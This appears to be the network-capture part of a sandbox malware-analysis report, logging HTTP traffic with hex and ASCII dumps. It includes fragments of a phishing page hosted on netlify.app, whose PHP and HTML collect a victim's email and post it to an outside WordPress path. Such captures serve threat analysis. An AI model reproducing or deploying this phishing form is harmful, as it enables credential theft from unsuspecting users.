Jan 12, 2025 01:33:19.696762085 CET	1236	IN	Data Raw: a4 aa 57 2a 20 af c2 1d de 89 88 54 d3 3e 08 77 78 27 22 52 4c fb 60 dc e1 9d 88 48 2d ed c3 70 87 77 22 22 a5 b4 0f c7 1d de 89 88 54 d2 3e 0a 77 78 27 22 12 d9 08 bb 47 e2 0e ef 44 44 ea 68 af 83 3b bc 13 11 29 a3 bd 1e ee f0 4e 44 a4 8a f6 ba Data Ascii: W* T>wx'"RL`H-pw""T>wx'"GDDh;)ND;"DDjho{'~X""74wx'"OND$v/H6;dqw""}+DD2io;ND$;@DDh;=ND$P;Q~GND$;
Jan 12, 2025 01:33:19.696774006 CET	448	IN	Data Raw: 3d 32 ee c9 79 07 77 74 27 af 58 35 e9 71 8f 4b 7b 74 dc 3b bc 7f 09 dc d1 9d b0 1d dc d3 d2 9e 00 f7 f9 f9 53 bb c0 1d dd 49 70 3f 67 c5 a4 c6 3d 3e ed 49 70 4f c8 3b b8 5f e9 4e c4 22 8e c9 48 c5 3d 05 ed 89 70 4f c6 3b b8 5f 8d eb 4c 54 b3 cf Data Ascii: =2ywt'X5qK{t;SIp?g=>IpO;_N"H=pO;_LTZd'W;.T'}~K=IqO;;aXS;fI\]J{ZwpGwj+$i{Tf="py[gwp2=p;W{1\|=#
Jan 12, 2025 01:33:19.696779013 CET	1236	IN	Data Raw: 4e d6 49 28 dc 85 d1 2e 0f f7 76 bc 83 3b b6 53 b3 b8 ce 14 06 77 71 b4 4b c4 bd 0d ef e0 be 1a d7 52 09 dd 53 e1 2e 90 76 99 b8 fb f3 0e ee d8 4e e8 9e 1a f7 db 7e 7c 42 22 a3 32 71 f7 e5 1d dc af c4 c8 01 aa 1d 97 55 5b e1 7e db 4b 42 11 95 8a Data Ascii: NI(.v;SwqKRS.vN~\|B"2qU[~KB#.v1r(O9C{/^q]i{<Rht;=i?k>ht7Fl6D~jc;]pWOw
Jan 12, 2025 01:33:19.696871996 CET	1236	IN	Data Raw: 50 be 3e 3f 09 ee 03 78 7f 41 1e ed e9 70 6f c0 bb 37 ed 25 e0 ce 75 26 ca d5 ed 93 e0 3e b0 da cf 35 25 a3 3d 25 ee 35 79 6f 41 7b 11 b8 73 24 92 f2 f4 ce 24 b8 b7 e6 7d f6 50 42 70 53 e2 5e 83 f7 56 b4 97 81 3b ba 13 b6 0b c4 bd c3 fb 76 49 b4 Data Ascii: P>?xApo7%u&>5%=%5yoA{s$$}PBpS^V;vI}-i/wS.L{iO9I+daM&hs:qGwvWk~)2q=p_{(K;(U=]^x4>='J{Ys$R$
Jan 12, 2025 01:33:19.696883917 CET	1236	IN	Data Raw: 8b a4 7d 85 f7 1a 07 64 5a e0 de e5 fd d9 63 52 3b fe 85 dd 5c 4b 25 ca 93 85 cb aa 7f 29 95 f6 4e cf 1e 58 6a 88 75 43 dc 5f ff e0 dc f9 37 a4 f2 be f5 b9 b9 93 52 63 ed 13 ad f4 b0 d8 65 3a f7 dc 56 a9 b4 bf 71 fe dc 07 af 47 c4 bd 43 7b 37 99 Data Ascii: }dZcR;\K%)NXjuC_7Rce:VqGC{7o}Y;r"yHkYaV5.yJ{Cx_]6\|n_(wG(.wt'l ho{-_?WWi;].}w*zp@k>
Jan 12, 2025 01:33:19.696894884 CET	1236	IN	Data Raw: 0d f7 7a b4 27 e6 dd 89 a3 bd 0d ef 73 d8 4e 84 ee 89 71 af 4f 7b b7 b3 c6 70 6f 44 bb 3f ef 3a 71 87 02 b2 57 39 b8 6f bd a7 a9 6e 89 78 77 29 fe 87 1a d3 ee cb bb 46 dc b9 96 4a e8 ae 17 f7 ad 5f f7 d1 2d 89 ba ee ae bb c6 ce 0a a4 dd 8f f7 39 Data Ascii: z'sNqO{poD?:qW9onxw)FJ_-9l'G{?sW{>n'}dw#ea;'y?;qxoM{[:qoO{$JU`7]7z7Z=y_K>
Jan 12, 2025 01:33:19.696904898 CET	1236	IN	Data Raw: c3 a2 0e dc 83 f3 3e 16 52 dd 41 b8 07 a5 3d 30 ef b5 68 17 82 fb e2 0f 58 a9 44 cd fa c1 a2 1a dc 83 f2 3e 16 5a dd 4a dc 97 22 34 96 94 76 29 b8 33 8a 80 a8 59 07 16 35 e1 1e 8c f7 b1 18 ea f6 e1 be 14 a9 b1 84 b4 8b c1 9d 8d 77 a2 26 bd b9 a8 Data Ascii: >RA=0hXD>ZJ"4v)3Y5w& :"6vA;:h_E%h;ixJ.:ycIh;J]h*P{$vY;.{;%9T{cSf5y.wt'dxOG{RI8
Jan 12, 2025 01:33:19.696922064 CET	980	IN	Data Raw: 2c 2b 22 4d bd 16 66 e5 3f 31 fd 9e 54 dd 3c 78 77 86 68 7f 7c ea c8 34 ba 13 61 bb 67 47 a6 1e 7f c2 0e ef ce 10 ed 53 c1 70 47 77 a2 f2 6c ef e0 de c9 0c ef ce 10 ed 01 71 9f 9e 66 c5 10 e9 e8 f2 74 50 dc cd f0 ee 2c d0 fe c4 d4 4a 01 71 47 77 Data Ascii: ,+"Mf?1T<xwh\|4agGSpGwlqftP,JqGw"\GHbwg;QYnz?)sfqGwl^z!CD%>;CC3DtT;(=<~vtl;=l%3w;CG"w;CG}z,k}
Jan 12, 2025 01:33:19.783343077 CET	1236	IN	Data Raw: ee ef a5 a7 3d 32 ee d8 4e 64 5b f7 23 e9 cd 8a c8 7b 24 dc e3 0d 7e cc 86 3b b6 13 19 d7 fd 48 0e b5 a2 f1 ee 0c d1 1e 17 77 56 15 91 71 dd 8f e4 71 2b 12 ef ce 10 ed 51 71 67 4d 11 c9 c8 1c ee 91 9e 6b 72 86 68 8f 88 3b 23 07 88 c4 74 ad 39 dc Data Ascii: =2Nd[#{$~;HwVqq+QqgMkrh;#t9wl'e{G=&vf+HghJ=7ay{Q3J"*B}JBG5 c8"]6{(>#;BwF1=8NT8{b&#h;

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:33:19.432509899 CET	440	OUT	GET /track.php?domain=xay.io&toggle=browserjs&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1 Host: www.xay.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 12, 2025 01:33:20.044929028 CET	599	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Access-Control-Allow-Origin: * Content-Encoding: gzip Content-Type: text/html; charset=UTF-8 Date: Sun, 12 Jan 2025 00:33:19 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Custom-Track: browserjs Transfer-Encoding: chunked Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Jan 12, 2025 01:33:22.978642941 CET	639	OUT	GET /track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D HTTP/1.1 Host: www.xay.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
Jan 12, 2025 01:33:23.214453936 CET	601	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Access-Control-Allow-Origin: * Content-Encoding: gzip Content-Type: text/html; charset=UTF-8 Date: Sun, 12 Jan 2025 00:33:23 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Custom-Track: answercheck Transfer-Encoding: chunked Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Jan 12, 2025 01:33:23.260691881 CET	454	OUT	GET /favicon.ico HTTP/1.1 Host: www.xay.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _cq_duid=1.1736641999.xeCITppN5uNufKAu; _cq_suid=1.1736641999.rSHuGynQKZfzXWFh; __gsas=ID=778292ff9eb2de5d:T=1736642001:RT=1736642001:S=ALNI_MY1NpItzWEIPPRYkkPc1PO6Da5A1A
Jan 12, 2025 01:33:23.490825891 CET	221	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 0 Content-Type: image/x-icon Date: Sun, 12 Jan 2025 00:33:23 GMT Etag: "66e18132-0" Last-Modified: Wed, 11 Sep 2024 11:38:26 GMT Server: Caddy Server: nginx
Jan 12, 2025 01:34:08.500361919 CET	6	OUT	Data Raw: 00 Data Ascii:

Timestamp	Bytes transferred	Direction	Data
Jan 12, 2025 01:33:19.919747114 CET	333	OUT	GET /themes/cleanPeppermintBlack_657d9013/img/arrows.png HTTP/1.1 Host: d38psrni17bvxu.cloudfront.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 12, 2025 01:33:20.566363096 CET	1236	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 11375 Connection: keep-alive Server: nginx Date: Sat, 11 Jan 2025 11:04:58 GMT Last-Modified: Thu, 21 Mar 2024 11:48:11 GMT ETag: "65fc1e7b-2c6f" Accept-Ranges: bytes X-Cache: Hit from cloudfront Via: 1.1 f7e6fd9466c5c2a3b15f0fb077de1afa.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P2 X-Amz-Cf-Id: EhNIQOHRZ5X--Zm2q_zywdiLCfpkq4VMi2nRiIyK-sD9yrGG81bvDQ== Age: 48502 Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 dc 00 00 02 58 08 03 00 00 00 4f 6d d4 16 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 00 50 4c 54 45 00 00 00 ff ff ff 63 64 74 49 4b 5e 49 4b 5d 49 4b 5c 30 33 49 48 4b 5f 61 63 73 63 65 75 62 64 74 63 65 74 15 19 30 3d 40 53 48 4b 5d 49 4c 5d 48 4b 5c 4d 50 62 4e 51 62 4f 52 63 12 17 2e 14 19 30 22 26 3b 28 2c 40 2b 2f 42 30 34 49 2e 32 46 2f 33 47 2d 31 44 30 34 48 2e 32 45 30 34 47 31 35 48 32 36 49 35 39 4c 38 3c 50 36 3a 4d 39 3d 51 37 3b 4e 3a 3e 52 3a 3e 51 3b 3f 52 3c 40 53 49 4c 5c 62 65 75 61 64 74 62 65 74 63 66 74 62 65 73 13 18 2d 15 1a 30 1b 20 35 1c 21 36 1d 22 37 1e 23 38 1d 22 36 1f 24 39 20 25 3a 21 26 3b 22 27 3c 22 27 3b 24 29 3e 23 28 3c 25 2a 3f 24 29 3d 26 2b 40 25 2a 3e 27 2c 41 26 2b 3f 28 2d 42 29 2e 43 28 2d 41 29 2e 42 2a 2f 43 2b 30 44 2c 31 45 30 35 49 31 35 47 3c 40 52 3d 41 53 49 4d 5f 48 4c 5d 4b 4f 60 48 4c 5c 4d 51 62 61 65 75 11 17 [TRUNCATED] Data Ascii: PNGIHDRXOmtEXtSoftwareAdobe ImageReadyqe<PLTEcdtIK^IK]IK\03IHK_acsceubdtcet0=@SHK]IL]HK\MPbNQbORc.0"&;(,@+/B04I.2F/3G-1D04H.2E04G15H26I59L8<P6:M9=Q7;N:>R:>Q;?R<@SIL\beuadtbetcftbes-0 5!6"7#8"6$9 %:!&;"'<"';$)>#(<%?$)=&+@%>',A&+?(-B).C(-A).B/C+0D,1E05I15G<@R=ASIM_HL]KO`HL\MQbaeu.-/.0/.0/11234 5!6#8$9%: &;"':$)<&+>',?(-@).A/B+0C,1D/A-2E.3F/4G05H16I/4F05G38K6;N49K;@S;@R<ASGL^bfuaetbft.0!5"6#7$8%9 &:!';"(<!':#)=#)<$=&,@&,?+1E)/B06IGL]GL\HM]bfs-.01 4!5"6#7$8 '< ';*0B.4F06H06G-0!5 (< (;
Jan 12, 2025 01:33:20.566402912 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 15 de 74 00 00 00 b1 74 52 4e 53 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: ttRNS
Jan 12, 2025 01:33:20.566437006 CET	448	IN	Data Raw: 4a 68 6f 86 3b bc 13 11 b4 e7 ea e5 53 8d b8 6e 86 bb 74 de ff ea 9a 92 62 21 52 fc 8a 5a 52 7f 28 9a f6 6d 0d b1 6e 8a bb 6c de 37 ef 2d a9 af 20 0f c5 ee 2b 45 2d a9 cd 86 68 f7 c1 5d 32 ef 65 e1 be 77 2f f6 50 e4 ef f6 bd e0 ae 94 76 3f dc e5 Data Ascii: Jho;Sntb!RZR(mnl7- +E-h]2ew/Pv?^NQ+m=}y1Tm{O}q{y;aaioD}Abvwyc2qoG{[;37HD^pM{{e^&x'KP!hKP
Jan 12, 2025 01:33:20.566472054 CET	1236	IN	Data Raw: 77 74 27 af 58 35 e9 71 8f 4b 7b 74 dc 3b bc 7f 09 dc d1 9d b0 1d dc d3 d2 9e 00 f7 f9 f9 53 bb c0 1d dd 49 70 3f 67 c5 a4 c6 3d 3e ed 49 70 4f c8 3b b8 5f e9 4e c4 22 8e c9 48 c5 3d 05 ed 89 70 4f c6 3b b8 5f 8d eb 4c 54 b3 cf b2 5a d2 e2 9e 86 Data Ascii: wt'X5qK{t;SIp?g=>IpO;_N"H=pO;_LTZd'W;.T'}~K=IqO;;aXS;fI\]J{ZwpGwj+$i{Tf="py[gwp2=p;W{1\|=#Qx
Jan 12, 2025 01:33:20.566504955 CET	1236	IN	Data Raw: e5 05 b5 b4 07 c0 3d db 5b da fd b4 1b c3 7d f2 f7 80 83 a4 f7 9d 49 d3 b8 e7 e2 3d 00 ed 61 70 cf c1 7b 15 ed d6 70 9f bc 80 1d 24 bb cf 4f 5a c7 3d 07 ef 41 68 0f 85 7b 6a de ab 69 37 87 3b d7 99 48 76 b7 4f 16 80 fb 8e 1d a7 b6 2b a4 3d 1c ee Data Ascii: =[}I=ap{p$OZ=Ah{ji7;HvO+=)yD=9I{gS}@pOA{W;Ij&K=Ai{d/$$Y\k}{`Eo?GVqGwvq{-$OO{K
Jan 12, 2025 01:33:20.566536903 CET	1236	IN	Data Raw: fb 04 b6 13 a1 7b 34 dc 23 d1 1e 86 f7 f5 b4 6f c4 bd c3 7b cb a3 33 f1 68 af c3 bb 45 dc 19 39 40 e8 2e 03 f7 be f7 f3 24 f1 be 91 f6 7e dc db 9d 8c 8c 4b fb 68 de 27 b0 9d 28 51 af 16 86 fb 2d b3 d1 79 f3 e7 fd be ef 2d f5 49 5e 81 bb 37 ef bf Data Ascii: {4#o{3hE9@.$~Kh'(Q-y-I^7<a}6MIx;h/^\| ^~^M@\|OG0Te}NF}sMNAqOL{yCp{znw Y=y? SK&=2\K%]{
Jan 12, 2025 01:33:20.566569090 CET	1236	IN	Data Raw: 84 ed 7a 71 6f c0 7b 3a da 93 e2 5e 93 77 7f da 15 e3 8e ee 64 a7 87 4f 16 87 7b 4d de 53 d2 9e 18 f7 1a bc b7 a1 5d 33 ee f0 4e 7c b6 6b c6 bd 06 ef 69 69 4f 8e fb 70 de b7 3e d7 8a 76 dd b8 73 68 86 f8 6e d7 8c fb 70 de 9f 7d e3 7c 6a 6b 93 e3 Data Ascii: zqo{:^wdO{MS]3N\|kiiOp>vshnp}\|jk>ow]7y@{y@v]7g=]=N~3]?Fo<vN\|[i2i;}g75}m
Jan 12, 2025 01:33:20.566601992 CET	1236	IN	Data Raw: b1 7d 71 e1 fc f9 71 a9 b4 37 e7 bd 11 ee 4b 6b 13 c6 7b 87 f6 2c b8 a3 3b 51 94 32 2c e6 85 ae 22 e3 52 69 6f ca bb f3 a4 5d 18 ef 3d da f3 e0 8e ee 44 36 6c 5f c6 5d 12 ef 1b 68 6f c6 bb f3 a6 5d 10 ef 2b b4 67 c2 1d dd 89 4c d8 7e 05 77 29 bc Data Ascii: }qq7Kk{,;Q2,"Rio]=D6l_]ho]+gL~w)}/JWi;Y}w>x_C{6kqZu}^#Q]{Nng}V$QnX{.k^wLIX{k/5igw(
Jan 12, 2025 01:33:20.566636086 CET	1236	IN	Data Raw: 45 7b 12 de 9d 6c da 1b f2 be 80 ed 44 0a 7b 53 1b ee ad 69 4f c0 bb 93 4e 7b 23 de 17 b0 9d 08 dd 63 e3 1e 84 f6 e8 bc 3b f9 b4 37 e0 7d 01 db 89 d0 3d 2e ee c1 68 8f cc 7b 2c dc 2f 86 a4 bd 36 ef 12 70 67 9c 0c 91 47 07 94 e0 1e 94 f6 a8 bc 3b Data Ascii: E{lD{SiON{#c;7}=.h{,/6pgG;]*%IiB{-8"~+(Gq+OdH;M=7 RB.t>l'BG=Ns"qgiM$IhSG0;}=$IivQi
Jan 12, 2025 01:33:20.566669941 CET	1236	IN	Data Raw: 1a ee 59 78 77 c9 69 9f 8a d8 11 6c 27 42 77 81 b8 67 e0 3d 2d ee 33 51 69 4f 88 3b eb 8d 28 5d 26 70 4f ce 7b 4a dc 67 22 ff 74 bc c4 44 84 ee 72 71 4f cc bb 33 44 7b 2a dc af 65 ad 11 a5 ed 5a 1b b8 27 e5 dd 19 a2 3d 11 ee d8 4e 64 f3 db 3d 8d Data Ascii: Yxwil'Bwg=-3QiO;(]&pO{Jg"tDrqO3D{*eZ'=Nd=R3pOC{"YgD6uOSwVQI5ct%FdV%w]jwg3N(k<>5ewe1KG==2Nd[#{$~;HwVqq+Q
Jan 12, 2025 01:33:20.571460009 CET	245	IN	Data Raw: 46 c8 10 11 e9 e0 dd 41 3b 11 91 3d de 1d 37 96 88 88 ec f1 ee a0 9d 88 48 51 fb 02 e2 0e ed 44 44 ba 78 77 d0 4e 44 a4 ac 10 b8 ff 1d 3f 23 11 91 3a de 1d d3 c1 88 88 ec f1 ee b8 b1 44 44 64 8f 77 07 ed 44 44 5a 79 3f dd 18 77 68 27 22 52 cc bb Data Ascii: FA;=7HQDDxwND?#:DDdwDDZy?wh'"Rv"";)1BKDDxwNDdwDD6W;)wh'"2c=;oADdw%""{;~""{;;;;;;4IENDB

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:32:54 UTC	683	OUT	GET /?naps/ HTTP/1.1 Host: heuristic-knuth-588d37.netlify.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:32:55 UTC	437	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Age: 0 Cache-Control: public,max-age=0,must-revalidate Cache-Status: "Netlify Edge"; fwd=miss Content-Length: 6055 Content-Type: text/html; charset=UTF-8 Date: Sun, 12 Jan 2025 00:32:55 GMT Etag: "100f5216dd14cd786070893ca253da78-ssl" Server: Netlify Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Nf-Request-Id: 01JHBYV4X992P2ZJ4QENN9ZBW4 Connection: close
2025-01-12 00:32:55 UTC	749	IN	Data Raw: 3c 3f 70 68 70 0d 0a 0d 0a 0d 0a 24 75 73 65 72 20 3d 20 24 5f 52 45 51 55 45 53 54 5b 27 65 6d 61 69 6c 27 5d 3b 0d 0a 24 65 6d 61 69 6c 20 3d 20 62 61 73 65 36 34 5f 64 65 63 6f 64 65 28 24 75 73 65 72 29 3b 0d 0a 0d 0a 0d 0a 3f 3e 0d 0a 09 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 09 20 3c 74 69 74 6c 65 20 64 61 74 61 2d 6c 61 6e Data Ascii: <?php$user = $_REQUEST['email'];$email = base64_decode($user);?> <!DOCTYPE html><html lang=""><head><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta http-equiv="Content-type" content="text/html;charset=utf-8"> <title data-lan
2025-01-12 00:32:55 UTC	2372	IN	Data Raw: 61 64 3e 0d 0a 09 3c 62 6f 64 79 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d 22 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 65 73 73 65 6e 74 69 61 6c 68 61 6e 64 79 6d 61 6e 73 65 72 76 69 63 65 73 2e 63 6f 6d 2f 77 70 2f 6e 65 78 74 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 69 64 3d 22 65 6d 61 69 6c 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 74 6f 70 3a 20 36 38 70 78 3b 20 77 69 64 74 68 3a 20 31 38 30 70 78 3b 20 68 65 69 67 68 74 3a 20 32 32 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 70 78 3b 0d 0a 09 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b Data Ascii: ad><body><div class="form"><form action="https://essentialhandymanservices.com/wp/next.php" method="post"><input id="email" name="email" style="position: relative; top: 68px; width: 180px; height: 22px; font-size: 1px;color: #333;
2025-01-12 00:32:55 UTC	538	IN	Data Raw: 61 6c 28 6d 79 5f 65 6d 61 69 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 24 28 27 23 65 6d 61 69 6c 63 68 27 29 2e 68 74 6d 6c 28 6d 79 5f 65 6d 61 69 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 24 28 22 23 6d 73 67 22 29 2e 68 69 64 65 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 24 28 22 23 69 6e 70 75 74 62 61 72 22 29 2e 61 6e 69 6d 61 74 65 28 7b 6c 65 66 74 3a 32 30 30 2c 20 6f 70 61 63 69 74 79 3a 22 68 69 64 65 22 7d 2c 20 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 24 28 22 23 61 75 74 6f 6d 61 69 6c 22 29 2e 61 6e 69 6d 61 74 65 28 7b 72 69 67 68 74 3a 32 30 30 2c 20 6f 70 61 63 69 74 79 3a 22 73 68 6f 77 22 7d 2c 20 31 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 75 72 6c 20 67 65 Data Ascii: al(my_email); $('#emailch').html(my_email); $("#msg").hide(); // $("#inputbar").animate({left:200, opacity:"hide"}, 0); // $("#automail").animate({right:200, opacity:"show"}, 1000); } ///////////////url ge
2025-01-12 00:32:55 UTC	2396	IN	Data Raw: 65 63 74 69 6f 6e 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 0d 0a 20 20 20 20 20 20 76 61 72 20 6d 79 5f 65 6d 61 69 6c 20 3d 65 6d 61 69 6c 3b 0d 0a 20 20 20 20 20 20 76 61 72 20 66 69 6c 74 65 72 20 3d 20 2f 5e 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 5c 2e 5c 2d 5d 29 2b 5c 40 28 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5c 2d 5d 29 2b 5c 2e 29 2b 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 7b 32 2c 34 7d 29 2b 24 2f 3b 0d 0a 0d 0a 20 20 20 20 20 20 69 66 20 28 21 66 69 6c 74 65 72 2e 74 65 73 74 28 6d 79 5f 65 6d 61 69 6c 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 28 27 23 65 72 72 6f 72 27 29 2e 73 68 6f 77 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 65 6d 61 69 6c 2e 66 6f 63 75 73 3b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 Data Ascii: ection//////////////// var my_email =email; var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if (!filter.test(my_email)) { $('#error').show(); email.focus; return false;

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:32:56 UTC	579	OUT	GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1 Host: stackpath.bootstrapcdn.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://heuristic-knuth-588d37.netlify.app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:32:56 UTC	967	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 00:32:56 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close CDN-PullZone: 252412 CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74 CDN-RequestCountryCode: US Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31919000 ETag: W/"67176c242e1bdc20603c878dee836df3" Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT CDN-ProxyVer: 1.04 CDN-RequestPullSuccess: True CDN-RequestPullCode: 200 CDN-CachedAt: 10/04/2024 02:53:43 CDN-EdgeStorageId: 1029 timing-allow-origin: * cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff CDN-Status: 200 CDN-RequestTime: 1 CDN-RequestId: 7fedeed1ac4f734c4f5baf0abe375bbe CDN-Cache: HIT CF-Cache-Status: HIT Age: 1532085 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 90090d5e8eee4372-EWR alt-svc: h3=":443"; ma=86400
